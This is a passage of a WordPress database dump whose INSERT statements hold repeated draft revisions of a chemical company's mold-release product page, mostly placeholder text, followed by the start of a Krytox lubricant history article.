span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4340" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers </h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 19:06:23', '2017-05-31 19:06:23', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4377, 3, '2017-05-31 19:31:16', '2017-05-31 19:31:16', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" width="100" padding="5px 30px 10px 30px" position_y="90" bg="rgba(255, 255, 255, 0.94)"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Advanced Composites</h2>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.\r\n\r\n[button text="READ MORE"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.\r\n\r\n[button text="READ MORE"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4340" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</h2>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.\r\n\r\n[button text="READ MORE"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.\r\n\r\n[button text="READ MORE"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.\r\n\r\n[button text="READ MORE"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4287" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.\r\n\r\n[button text="READ MORE"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4179"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast Mold Release Mold Release</h2>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.\r\n\r\n[button text="READ MORE"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 19:31:16', '2017-05-31 19:31:16', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4378, 0, '2017-06-01 02:28:23', '2017-06-01 02:28:23', '', '', '', 'publish', 'closed', 'closed', '', '4378', '', '', '2017-06-01 02:28:23', '2017-06-01 02:28:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/4378/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4379, 0, '2017-06-01 11:55:12', '2017-06-01 11:55:12', '', '', '', 'publish', 'closed', 'closed', '', '4379', '', '', '2017-06-01 11:55:12', '2017-06-01 11:55:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/4379/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4380, 3, '2017-06-01 12:29:58', '2017-06-01 12:29:58', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" text_depth="1" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4340" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 12:29:58', '2017-06-01 12:29:58', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4381, 3, '2017-06-01 12:33:10', '2017-06-01 12:33:10', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4340" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 12:33:10', '2017-06-01 12:33:10', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4382, 3, '2017-06-01 12:45:02', '2017-06-01 12:45:02', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.  Products for this application  need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  <b>ReleaSys </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4340" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 12:45:02', '2017-06-01 12:45:02', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4383, 3, '2017-06-01 13:26:26', '2017-06-01 13:26:26', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.  Products for this application  need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes  an ever-widening variety of thermoplastic resins.  In response to this evolving industry, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4340" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane (Rigid, Visco-Elastic, Flexible Foam, Skin)</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4287" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4179"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 13:26:26', '2017-06-01 13:26:26', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4384, 2, '2017-06-01 14:12:43', '0000-00-00 00:00:00', '<h6 style="text-align: center;">[share title=""]</h6>\n<h3 style="text-align: center;">Krytox History &amp; Product Overview</h3>\n<strong>For the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a></strong>\n\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\n\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\n\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases has been adopted across a very wide range of industries and applications. There are 